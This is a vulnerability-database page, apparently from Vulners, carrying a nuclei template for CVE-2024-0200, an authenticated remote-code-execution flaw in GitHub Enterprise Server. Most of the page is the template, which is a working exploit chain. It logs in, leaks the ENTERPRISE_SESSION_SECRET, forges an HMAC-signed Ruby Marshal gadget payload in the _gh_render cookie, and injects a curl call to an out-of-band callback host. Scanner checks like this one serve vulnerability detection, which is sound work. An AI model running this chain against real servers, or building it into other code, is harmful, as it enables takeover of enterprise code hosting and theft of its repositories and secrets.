Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Github Enterprise Authenticated Remote Code Execution

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 104 Views

Github Enterprise Authenticated Remote Code Execution vulnerability in GitHub Enterprise Server prior to version 3.1

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Unsafe Reflection in Github Enterprise_Server
18 Mar 202403:19
githubexploit
BDU FSTEC		The vulnerability of the corporate version of the GitHub Enterprise Server, related to the use of external management input for class selection, allows a perpetrator to execute arbitrary code.
24 Jan 202400:00
bdu_fstec
Circl		CVE-2024-0200
17 Jan 202408:44
circl
CNNVD		GitHub Enterprise Server Security Vulnerability
16 Jan 202400:00
cnnvd
CVE		CVE-2024-0200
16 Jan 202418:50
cve
Cvelist		CVE-2024-0200 Unsafe Reflection in Github Enterprise Server leading to Command Injection
16 Jan 202418:50
cvelist
NVD		CVE-2024-0200
16 Jan 202419:15
nvd
OSV		CVE-2024-0200
16 Jan 202419:15
osv
Prion		Design/Logic Flaw
16 Jan 202419:15
prion
Positive Technologies		PT-2023-8397 · Github · Github Enterprise Server
26 Dec 202300:00
ptsecurity
Rows per page
id: CVE-2024-0200

info:
  name: Github Enterprise Authenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
  impact: |
    Authenticated attackers with organization owner privileges can exploit unsafe reflection to execute arbitrary code remotely, leading to complete compromise of the GitHub Enterprise Server instance and potential access to all repositories and data.
  remediation: |
    Upgrade to GitHub Enterprise Server version 3.8.13, 3.9.8, 3.10.5, or 3.11.3 or later.
  reference:
    - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
    - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.10.5
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.11.3
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.8.13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0200
    cwe-id: CWE-470
    epss-score: 0.71725
    epss-percentile: 0.99343
    cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: github
    product: "enterprise_server"
    shodan-query:
      - "title:\"GitHub Enterprise\""
      - micro focus dsd
    fofa-query: "app=\"Github-Enterprise\""
  tags: cve,cve2024,rce,github,enterprise,vuln
variables:
  username: "{{username}}"
  password: "{{password}}"
  oast: "curl {{interactsh-url}}/?"
  padstr: "{{randstr}}"
  payload: "{{padding(oast,padstr,300,'suffix')}}"
  marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
  b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
  digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
  final_payoad: "{{ b64_marshal_data + '--' + digest}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v3/user/orgs"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    extractors:
      - type: json
        part: body
        name: org_name
        internal: true
        json:
          - ".[].login"

  - method: GET
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"role": "admin"'
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
    headers:
      Content-Type: application/json
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    body: |
          {
            "name": "{{randstr}}"
          }
    matchers:
      - type: status
        status:
          - 201

  - method: GET
    cookie-reuse: true
    path:
      - "{{BaseURL}}/login"
    extractors:
      - type: regex
        part: body
        internal: true
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'
        name: csrf_token

  - method: POST
    path:
      - "{{BaseURL}}/session"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "_gh_render"
        part: header

  - method: GET
    path:
      - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
    extractors:
      - type: regex
        group: 1
        name: ghe_secret
        internal: true
        regex:
          - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
        part: body
    matchers:
      - type: word
        words:
          - 'ENTERPRISE_SESSION_SECRET'
        part: body

  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      Cookie: _gh_render={{final_payoad}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100ae69144548eb7d746bd251f849afde1d662a6fc5f08a34d8a0549c330214f8620221009d21c1c8f4a76207e29da7d4f72b7b168b814de185ab5642141d2570f99d1092:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.17.2 - 9.8
EPSS0.71725
SSVC
cve-2024reflection injectionuser-controlled methodsremote code executionghesorganization owner rolegithub enterprise.
104